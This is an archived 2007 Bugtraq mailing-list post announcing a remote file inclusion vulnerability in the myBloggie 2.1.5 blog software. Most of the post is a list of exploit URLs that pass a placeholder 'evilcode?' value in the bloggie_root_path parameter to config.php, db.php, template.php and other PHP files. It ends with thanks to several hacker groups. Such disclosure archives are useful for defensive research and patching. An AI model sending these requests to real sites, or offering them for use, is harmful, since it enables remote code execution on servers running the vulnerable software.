| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070609170839.14271.qmail@securityfocus.com>
Date: 9 Jun 2007 17:08:39 -0000
From: yaser@...cturk.net
To: bugtraq@...urityfocus.com
Subject: myBloggie 2.1.5 Remote File Include
#########################################################################
#
# myBloggie 2.1.5 RFI
#
# Author: Yaser <yaser@...cturk.net>
#
# Homepage: http://www.ayyildiz.org
#
#########################################################################
#########################################################################
# Download S : http://mywebland.com/download.php?id=19
#
# Exploits:
#
# http://site/config.php?bloggie_root_path=evilcode?
# http://site/includes/db.php?bloggie_root_path=evilcode?
# http://site/includes/template.php?bloggie_root_path=evilcode?
# http://site/includes/functions.php?bloggie_root_path=evilcode?
# http://site/includes/classes.php?bloggie_root_path=evilcode?
# http://site/viewmode.php.php?bloggie_root_path=evilcode?
# http://site/blog_body.php?bloggie_root_path=evilcode?
#
#########################################################################
Thanks: H0tturk - ir4dex - ht08 - ajann - GencTurk - Zakix - Devil Hacker
Referance: www.h0tturk.com and Stefan Esser